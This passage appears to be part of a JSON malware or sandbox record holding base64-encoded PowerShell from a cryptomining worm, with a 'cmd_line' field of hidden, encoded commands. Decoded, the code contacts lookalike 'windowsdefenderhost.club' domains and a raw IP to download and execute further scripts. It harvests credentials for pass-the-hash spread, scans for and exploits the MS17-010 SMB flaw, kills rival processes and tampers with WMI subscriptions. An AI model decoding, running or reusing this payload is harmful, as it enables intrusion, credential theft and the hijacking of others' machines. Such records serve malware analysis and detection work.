AKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADo